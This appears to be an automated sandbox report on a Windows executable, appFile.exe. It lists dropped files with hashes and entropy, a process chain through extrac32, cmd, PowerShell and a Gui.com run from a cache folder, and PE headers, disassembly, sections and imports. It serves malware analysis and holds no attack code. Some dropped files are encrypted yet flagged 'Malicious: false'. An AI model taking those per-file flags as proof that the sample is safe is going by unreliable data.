SHA-512: | 23A600137D5B4B71F2916E879997DA3919724CDD9A31DD1E93BF14CCBD1776F2473156C45A3D6B3912E0EF0C71E8AA9EC08D1BD63C10B9554B2A7820B83EAC8E |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\appFile.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 79872 |
Entropy (8bit): | 7.997865165972455 |
Encrypted: | true |
SSDEEP: | 1536:Aasy7d2X5yR0/KNaLB3+p8fVzrGJOijnVzWtpQAtiDGzolU+CBv:d7Q5yR0U+aMijVzu+D7lU+CBv |
MD5: | 88328166A2AB03B661C74B7CFD2D122B |
SHA1: | CFF3C0915CD8AA8FB7611C4ADCD7575E6DE7A03E |
SHA-256: | F32E0AA35B7EAD1C1F80E489ABA078FCFEFA335CC29D8F85A17D60BC9BF1D10C |
SHA-512: | 3F6FA37B3079F24FEEA28195595970E79D3978CEB0147F257735A97A9A136B3D373EC7B0EBBF63AFBB9D0897590853318A73C6674BABB8A6A78C65E4BCE149B6 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\appFile.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 78848 |
Entropy (8bit): | 7.997579436445676 |
Encrypted: | true |
SSDEEP: | 1536:dJUd+iw0qD8xTVsiBdheSQnbaSkHQNy6EfznLNGrhHcl9nEXTq0yI3hGM7:fAqwxTVphgnbaSkjMBqjC7 |
MD5: | 937588E2A4494E4A0F9912023FCE07F6 |
SHA1: | 1CC2DC73980D79F59DCF1D15BA97474392D5ED54 |
SHA-256: | 9F95F6F88724EC7BC32B16A5C97B2AD8C0D24BFD0DC0A429010FF9B0B298F8F5 |
SHA-512: | 40F0FF2B03CA65D5FB99170E49E8B8F160305C521C42DDCB2B4A73879703DC34393F733494894CE0EB60B1C76057EA393E4C6660284C816EFECECE60B77BDFC5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 132096 |
Entropy (8bit): | 5.692951409130076 |
Encrypted: | false |
SSDEEP: | 1536:FsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPdU:FeAg0Fuz08XvBNbjaAtsPC |
MD5: | F46AE2EC08211D846EEF8A6D25EE6EBE |
SHA1: | 53E108FD5B1646FA356A6C20BABC25056949AD01 |
SHA-256: | D47F9A1E03327FEA4A1832413331FC958D31D52F1ED2C32DAC107C00149BD6A2 |
SHA-512: | EBA8B3D6D32120408A08A9C7DFF2405A1C040779CF686381176E48771497CAD1B2DA06754DD563175377A8F2446F8715543518AFEFE95342F2490C8C7CB6578F |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 136192 |
Entropy (8bit): | 6.398172438992248 |
Encrypted: | false |
SSDEEP: | 3072:lZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05P:lK5vPeDkjGgQaE/loUDtf0R |
MD5: | E652FA6FE25787D5B8CFAA85F94AD965 |
SHA1: | B87445BF8123D7E016529ED1055F486B87088440 |
SHA-256: | 244691058924D3D48EB335C7FBF4AC04D7E4F6D0529D6CE0BC815B348BE3A0FD |
SHA-512: | 908D36A6EB84B5EC8540DE8C94F4051FEF9D3E6E8F25569A02BBBB39F0A123F389DD407F824ACF9E8EF12BEBAE0B3B4AD6E25BCF0BE7F8F5F9C336117F3AA179 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60416 |
Entropy (8bit): | 6.6802214631228205 |
Encrypted: | false |
SSDEEP: | 1536:Z6LdTmHwANUQlHS3cctlxWboHdMJ3RraSXLi:udTmRxlHS3NxrHSBRtm |
MD5: | 615FD1C7CA88520FCB5806BE3E4BDF55 |
SHA1: | 462427F2D4A2351E3B0F863F9E23D965A91E9F30 |
SHA-256: | 85700EE72DDD61A0476B7EEB65F5F13DAFCECB045221943F101C5250E481A12A |
SHA-512: | D5F5CC2C06DAF53F888EAE9ACC83DEEAA6493ECE82FC95EE04EF8D550A4011B990E4F2C4A458C450EC389408072E79F2158240CE3C120150A994A8484ACD5503 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\appFile.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 51200 |
Entropy (8bit): | 7.995943793398164 |
Encrypted: | true |
SSDEEP: | 1536:jLCv02gRayab1fvAwWQrF6DECzZ5Pk8t9UXa4s3E:jLItD5fZWOFUE8t9UXuE |
MD5: | 1DE34608491DC72C7F881263715BD4A5 |
SHA1: | EE890FD73FC88E332BBC704ED9579BBA5CC525ED |
SHA-256: | 9B19FDF73FC6AD05386046165AF5E0721535A31BEA395669E80CB4F7184E6FEF |
SHA-512: | 2D44C5EA11DAA2A6E89CCAF8D17E5C3796E85666DA345F57E7DC2FAF9F4C03E43D61AFCFDB015DEB54229476B49A7F99F6424F1BC99ED34A1A8442221498A7FE |
Malicious: | false |
Antivirus: |
|
Preview: |
Process: | C:\Users\user\Desktop\appFile.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 69632 |
Entropy (8bit): | 7.997095233110027 |
Encrypted: | true |
SSDEEP: | 1536:DSE0VZSkh69BcbzfQ2PnnJkNlPZ2szSRHlBm+wL:ISkh6YbzJnJkrPZrzSlY |
MD5: | 7EE2D94557987DBEAC1A8BF414206F63 |
SHA1: | 1B303117B31F494149647F7DB110DC1FCDA8A628 |
SHA-256: | A1422DC69D1537BAAC01678C2EF2A2CF3DB3F8B0B3283AF06BAA71991E7CA051 |
SHA-512: | 0F74FCBB25EEE5A1BA8DB3493CFE99A8483328E3C4DAC62303C4BECAA508C44D2E240A7ED581D52B2827135A44686C274568D08ACEE1860DA7B4F4648FB4C4AE |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\appFile.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60416 |
Entropy (8bit): | 7.996852056005408 |
Encrypted: | true |
SSDEEP: | 1536:Nb4TK29YzuHw3UB2xb1yfEvvaGsmmXUSsgBmlzGXr:F0dgxbQ8vsBXUSsgBigr |
MD5: | 9167A8A49DC18E63DF8F7173C2DA5094 |
SHA1: | D60EEBF450CAEB3C3F23E15E9F82029AB63A512E |
SHA-256: | DCC1D1F61FB4F61B18B05E45B92BA7522FE555FC2D016F58697B574FD99DE2DE |
SHA-512: | 8E40DC18E811B23D4CBFB37CC81FF821486EB0711FFB69BB0444ADDE66886E727D4C0025970C903B07C387AC2EE1448917F380ACA0ECB51B91E5F42ABAF13275 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 6.682806123211138 |
Encrypted: | false |
SSDEEP: | 3072:UeOyKODOSpQSAU4CE0Imbi80PtCZEMnVIPPBxT/sZ7:ULsiS+SAhClbfSCOMVIPPL/sZ7 |
MD5: | 1C97F1E7AB5F54B0D89EBDE899AD008E |
SHA1: | 21629DC6AE5C731694DA40E3E597E4B8AEDEF7C2 |
SHA-256: | E0F4DD9362A2A639B58BED79255A553EE29F60E773C687CF0C1DBA76EFADB2E4 |
SHA-512: | 32F6B421FE83D8A78EC354944C9E811819FD22F500BE0301E610BC3A6120A37C6C3EF5C0D347A6A17C5E63D7B695710C183C20DC15E92D5229F4E9861D6A3F49 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\appFile.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29667 |
Entropy (8bit): | 5.105162272334706 |
Encrypted: | false |
SSDEEP: | 768:Q5uso2lFUA8nSEV6zMp1GOTLDDv1DsQEQvRCneKMhNiJ3:Q5u6IA8wzYGOvDBDHXKMq |
MD5: | 932E77F4346C15FB44476F3DC340F1BE |
SHA1: | 909C1135CFC7747BE3F7631A93501BCEC6AE5CA1 |
SHA-256: | 76AF347FAAED4C3C1D3AD41F6BA88573AE236242720E6CBC0E4844DCBE656664 |
SHA-512: | 7EFAFD9CAEA48D25CD38242E9ACFFBF486C35710577FD138D139095396BFCE7FFA9D7B61BE4CE38339FF2417C6164481603789EE62B3EAD7A3438E62B55F5910 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\cmd.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29667 |
Entropy (8bit): | 5.105162272334706 |
Encrypted: | false |
SSDEEP: | 768:Q5uso2lFUA8nSEV6zMp1GOTLDDv1DsQEQvRCneKMhNiJ3:Q5u6IA8wzYGOvDBDHXKMq |
MD5: | 932E77F4346C15FB44476F3DC340F1BE |
SHA1: | 909C1135CFC7747BE3F7631A93501BCEC6AE5CA1 |
SHA-256: | 76AF347FAAED4C3C1D3AD41F6BA88573AE236242720E6CBC0E4844DCBE656664 |
SHA-512: | 7EFAFD9CAEA48D25CD38242E9ACFFBF486C35710577FD138D139095396BFCE7FFA9D7B61BE4CE38339FF2417C6164481603789EE62B3EAD7A3438E62B55F5910 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 105472 |
Entropy (8bit): | 6.5937014476222 |
Encrypted: | false |
SSDEEP: | 3072:aVOoQ7t8T6pUkBJR8CThpmESv+AqVnBypIbv18mLtB:96AUkB0CThp6vmVnjpB |
MD5: | A7567F196E671F96671B95BFAB15FA57 |
SHA1: | 325B32994BC9002F377C7298AF79EAA65FBF1519 |
SHA-256: | 2408D1FBCE48E5F54483F9C4C1B33A8C063F49F522268AC1FE6D6D67E8FD7BEA |
SHA-512: | 5B3C4EAB780B9CA0C5D2B9FC6ACDC440366488D6425323563FD032A9AA464453075B633BEFC2A160719EE0AB0EDF39A497BEB8FB6C3C78E936ADC9A7CC37E2BE |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 116736 |
Entropy (8bit): | 6.42012817526952 |
Encrypted: | false |
SSDEEP: | 3072:bfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTq8Qh:bfhnvO5bLezWWt/Dd314V14ZgP0Jh |
MD5: | 1E44BC506DA7439E081DEA2498280469 |
SHA1: | CF9B86AA16612DE8C8A9B285DD71813466CFBE36 |
SHA-256: | 74B6145C337C2508753EFA7AF2312C4B44BDA64BB061FBE57326726FAC25421A |
SHA-512: | 62D79EE9823BF5F9ACC096E905BECDE23961715CC52EE308306A07B6B83CC253E56B89DBF386A6DB682A80131E6FFD5377E4F244A7BE1B6B6FC1CCF4222C2217 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\appFile.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 488058 |
Entropy (8bit): | 7.998560296626183 |
Encrypted: | true |
SSDEEP: | 6144:3TxigRzgizBSPNmelfYbTYgBVPLhTmaGNi3VGnDURxM5imADe/L4sFaSqjQh32jh:D9hgblwPxzJmfLARC5imAqXQ2M |
MD5: | E424E02D117BDBE845A8E681B6C37350 |
SHA1: | 749C78B8A0B93AAFE974A151D06DF4EA90583FB1 |
SHA-256: | 7D6DEF57BBCB39B1DC0A7868C642ECF78CFC03528E64DD663252D2058A2FFC46 |
SHA-512: | C9B91731CAAD10FDB821002DEF3DC56191E560FC3236091A1695D2DE33E9E0FD42B4BD772A8DDC6A4B8E7CBF85F85D5034DFFDCA4033A01839168E0CE243D79A |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1621 |
Entropy (8bit): | 4.654813593375602 |
Encrypted: | false |
SSDEEP: | 24:RyGS9PvCA433C+sCNC1skNkvQfhSHQU2L55e1yb/uBx39lt6DP:q9n9mTsCNvEQH5O5U1nPy |
MD5: | 04DADF58AC9D154C18CD8BF7937083CA |
SHA1: | 01922A2A364767C255DB35FD5C352EE2FB6D1E58 |
SHA-256: | 3A053368D74FD118292B1D655D0EA422B0819BEF432ECDDC89C1CD5442677EB9 |
SHA-512: | 3A15B6069E24A57BCD76BF9851777704B6A1317C8ADD7FD63174FF70E90B5B7E957F281B578526BAC0A246E47684C4D60650FFAB2D4D708DCA4E5C780BF35CA4 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 146953 |
Entropy (8bit): | 5.980302829301109 |
Encrypted: | false |
SSDEEP: | 3072:O6whxjgarB/5elDWy4ZNoGmROL7F1G7ho2kOb:O6ggarZ8aBZ2GmRq76tl |
MD5: | 90E084E0DE9BC06DB48F8C4A44968105 |
SHA1: | 8C802BF26E6C72A292AC57719CA56DF884CD3E36 |
SHA-256: | B4CDB99602323867A974A3B51484F3C315F9A626B5C883EFD10E0E6B0ABA7A3B |
SHA-512: | 9E5B15453E2350274D55B2B4F801DFD85D2D64E3132E0554DD5C1261730EB920A665293C29080998AF3097E76D930CC87C0F7D9C45F8F585532FE891805E637E |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\appFile.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 83968 |
Entropy (8bit): | 7.998222945645998 |
Encrypted: | true |
SSDEEP: | 1536:REGRL/IUjSmwtXUsaQWX3sI9SnewDJBzm9zXmvqIJ+8vOpxOmgUc64:jJLSbUsaQsz9Snewddm9zWyOLmpxOVU6 |
MD5: | 62C6267C11124D4BD67EF8EA7ABAEC49 |
SHA1: | 11FA81E4758B8310D22CB95EDCF16DF4EC4B4E13 |
SHA-256: | 6E8F52129C2B395F1FD5A9C0138F0520C7B5EE67FE6D1C2058F6206403968927 |
SHA-512: | 983263B370C12E4AEF2DC3C82A661E305CCFA71114F3D365F8789DCBECCDBBD6A510BD418513EF3E823E9D9478DDC1CF4AA5C1B9952B5D06EBEEDB97D08F9677 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60416 |
Entropy (8bit): | 6.644803794527603 |
Encrypted: | false |
SSDEEP: | 1536:Z1rKoUn9r5C03Eq30BcrTrhCX4aVmoJiKwtk2ukCE:6Pnj0nEoXnmowS2u5E |
MD5: | 4FDE037E68E96389EA1B8051666671BE |
SHA1: | 0CDF6FEE9191C2DBC65B90BCABD298325878451F |
SHA-256: | 5E048EFA928EAEA5CCF29372EAF89FB7CCB82E5269E59CC9807F181EBB0BC144 |
SHA-512: | 9646D4FA08A8F6E93544AF4EE4D979D937F70A47A9471B54D9E904883D6783381FCE2146C86ED2BCD5A98274F21DEF20F756EA95F5F43F4832E23B2F65625999 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 56320 |
Entropy (8bit): | 6.636320600447913 |
Encrypted: | false |
SSDEEP: | 1536:ujKu2IwNnPEBiqXv+G/UXT6TvY464qvI93Z:ujccBiqXvpgF4qv+3Z |
MD5: | 20C2516CEDEDF0815E04EDA1597593DE |
SHA1: | 687E5CE22DA4ED23CFCC45E012C9DFE2BA0A032F |
SHA-256: | C091F708383DC2F43B5F2C5E871E4F2A4EF57F4E515D26FA7759A1B56D096FFA |
SHA-512: | BBDA2D72F823FFE1F7716B8FE32505D1D663AD26F4D71CF4A4DDCA407BD2D030031611014B7FBF16B9CF4845E34613A19830B3D9C0210933171C27149EF90004 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1510207563435464 |
Encrypted: | false |
SSDEEP: | 3:NlllulBkXj:NllUS |
MD5: | 453075887941F85A80949CDBA8D49A8B |
SHA1: | 7B31CA484A80AA32BCC06FC3511547BCB1413826 |
SHA-256: | 84466098E76D1CF4D262F2CC01560C765FE842F8901EEE78B2F74609512737F8 |
SHA-512: | 02E95B30978860CB5C83841B68C2E10EE56C9D8021DF34876CD33FD7F0C8B001C288F71FBBFF977DDF83031BD6CD86AC85688A6EFB6300D0221AA4A22ABE7659 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\473587\Gui.com |
File Type: | |
Category: | dropped |
Size (bytes): | 16791 |
Entropy (8bit): | 4.431180163596247 |
Encrypted: | false |
SSDEEP: | 192:xSD+TD90sp7aSVbJ/CtzfWdYdKG7VhN3EpIJ5tFtQjMY5VhIJ+Ik:7azfVZ3LPQD6J7k |
MD5: | 2E59DF53309DBD234F876BAD5C73F5B4 |
SHA1: | BB243841CEA5D85A0E2849C949B9BB11CEB4FC33 |
SHA-256: | B73DF91C83960A7DCCE8F112B1F7E4DB8EC6B659D4AC706F79A1A703297533DD |
SHA-512: | 34C966EC7213CA502849BAC1BB6B18A3C4B30EC07EB8FFAA837D048ED853C15842256C6C2869F96ADBA2EB9994A85393CED0CEDC72B9A9DA8E08BB019FBB3E5A |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\473587\Gui.com |
File Type: | |
Category: | dropped |
Size (bytes): | 1835008 |
Entropy (8bit): | 4.418967861441285 |
Encrypted: | false |
SSDEEP: | 6144:+Svfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNd0uhiTw:dvloTMW+EZMM6DFyn03w |
MD5: | 2B34F1D03CBD21FFDFA56EDE04150ED8 |
SHA1: | 4FB7460405F7B87F555505F3E144E3F8FDD79C05 |
SHA-256: | 899ED672E2B994979958738A20477389C75AD3C12F312221CACB5C32AC6ED541 |
SHA-512: | 393E639DBA0EE773AD77F05C0D47CFC6FC16E5FD2D5AEF866E349E94D59A9AE15A60AF7AFE9B07A0DCFE7B0C4C9AA2AFEA8033F132C804390A9D1EC0BA87085F |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 6.6629032088062825 |
TrID: |
|
File name: | appFile.exe |
File size: | 38'010'389 bytes |
MD5: | 8e9470197062cc090f733b985f2de5d4 |
SHA1: | d99fa5c8ee7edb80ffcdf6e777b43e08d5456103 |
SHA256: | aba80a73b34a6fee80168217a4642f618aadd7f97803bb57242025068da3ce7b |
SHA512: | 1e5ea1524f94b28dc5677b234d16d10df5e66396d0a82b512267fc8a966cf7b757b3e2a3f6b03cecd7f0ad9962580b4588e602f4e342467341923bbb70ccc8ce |
SSDEEP: | 393216:UYOpceiJ1z1bAISY9rMTlSd7JZnNXjFexpRWWy8ElyftIusM2yIdc11Av/NElH4u:wcegRb3gsXNG118ptLwClC |
TLSH: | B487AE1AB7EC40A5D07BC238C9678616E7B1BC11073097CF2294B66E5F77BD05A3A722 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X|.N.................n.......B...8..... |
Icon Hash: | 16eb0e7f9c7a988b |
Entrypoint: | 0x403883 |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | EXECUTABLE_IMAGE, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x4E807C58 [Mon Sep 26 13:21:28 2011 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | be41bf7b8cc010b614bd36bbca606973 |
Signature Valid: | false |
Signature Issuer: | CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2 |
Signature Validation Error: | No signature was present in the subject |
Error Number: | -2146762496 |
Not Before, Not After |
|
Subject Chain |
|
Version: | 3 |
Thumbprint MD5: | 9414777E3E5EFD8F30BD41B0CFE7D030 |
Thumbprint SHA-1: | 75E0ABB6138512271C04F85FDDDE38E4B7242EFE |
Thumbprint SHA-256: | CA42DD41745FD0B81EB902362CF9D8BF719DA1BD1B1EFC946F5B4C99F42C1B9E |
Serial: | 0400000000010F8626E60D |
Instruction |
---|
sub esp, 000002D4h |
push ebx |
push ebp |
push esi |
push edi |
push 00000020h |
xor ebp, ebp |
pop esi |
mov dword ptr [esp+18h], ebp |
mov dword ptr [esp+10h], 00409268h |
mov dword ptr [esp+14h], ebp |
call dword ptr [00408030h] |
push 00008001h |
call dword ptr [004080B4h] |
push ebp |
call dword ptr [004082C0h] |
push 00000008h |
mov dword ptr [00472EB8h], eax |
call 00007F4390E67E2Bh |
push ebp |
push 000002B4h |
mov dword ptr [00472DD0h], eax |
lea eax, dword ptr [esp+38h] |
push eax |
push ebp |
push 00409264h |
call dword ptr [00408184h] |
push 0040924Ch |
push 0046ADC0h |
call 00007F4390E67B0Dh |
call dword ptr [004080B0h] |
push eax |
mov edi, 004C30A0h |
push edi |
call 00007F4390E67AFBh |
push ebp |
call dword ptr [00408134h] |
cmp word ptr [004C30A0h], 0022h |
mov dword ptr [00472DD8h], eax |
mov eax, edi |
jne 00007F4390E653FAh |
push 00000022h |
pop esi |
mov eax, 004C30A2h |
push esi |
push eax |
call 00007F4390E677D1h |
push eax |
call dword ptr [00408260h] |
mov esi, eax |
mov dword ptr [esp+1Ch], esi |
jmp 00007F4390E65483h |
push 00000020h |
pop ebx |
cmp ax, bx |
jne 00007F4390E653FAh |
add esi, 02h |
cmp word ptr [esi], bx |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9b34 | 0xb4 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf4000 | 0x3324e | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x13aa54 | 0x5390 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7a000 | 0x964 | .ndata |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2d0 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x6dae | 0x6e00 | 00499a6f70259150109c809d6aa0e6ed | False | 0.6611150568181818 | data | 6.508529563136936 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x8000 | 0x2a62 | 0x2c00 | 07990aaa54c3bc638bb87a87f3fb13e3 | False | 0.3526278409090909 | data | 4.390535020989255 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xb000 | 0x67ebc | 0x200 | 014871d9a00f0e0c8c2a7cd25606c453 | False | 0.203125 | data | 1.4308602597540492 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.ndata | 0x73000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0xf4000 | 0x3324e | 0x33400 | b608592ca4bba5795bb8a4f854900458 | False | 0.6227229420731707 | data | 6.080504929946679 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x128000 | 0xf32 | 0x1000 | 4fea51a9753d38e2d2c5b12832cdc696 | False | 0.601318359375 | data | 5.524394282648389 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0xf43b4 | 0x9a80 | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced | English | United States | 1.0005309466019416 |
RT_ICON | 0xfde34 | 0x2ead | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0009205791279605 |
RT_ICON | 0x100ce4 | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.7256916192026037 |
RT_ICON | 0x10334c | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.8028233151183971 |
RT_ICON | 0x104474 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.9104609929078015 |
RT_ICON | 0x1048dc | 0x9e6f | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | 0.9945018368302966 | ||
RT_ICON | 0x10e74c | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | 0.23423636578729445 | ||
RT_ICON | 0x11ef74 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | 0.2866084081247048 | ||
RT_ICON | 0x12319c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | 0.32354771784232367 | ||
RT_ICON | 0x125744 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | 0.3803939962476548 | ||
RT_ICON | 0x1267ec | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | 0.5469858156028369 | ||
RT_DIALOG | 0x126c54 | 0x100 | data | English | United States | 0.5234375 |
RT_DIALOG | 0x126d54 | 0x11c | data | English | United States | 0.6056338028169014 |
RT_DIALOG | 0x126e70 | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0x126ed0 | 0x5a | data | 0.7888888888888889 | ||
RT_GROUP_ICON | 0x126f2c | 0x4c | data | English | United States | 0.8026315789473685 |
RT_MANIFEST | 0x126f78 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193 |
DLL | Import |
---|---|
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW |
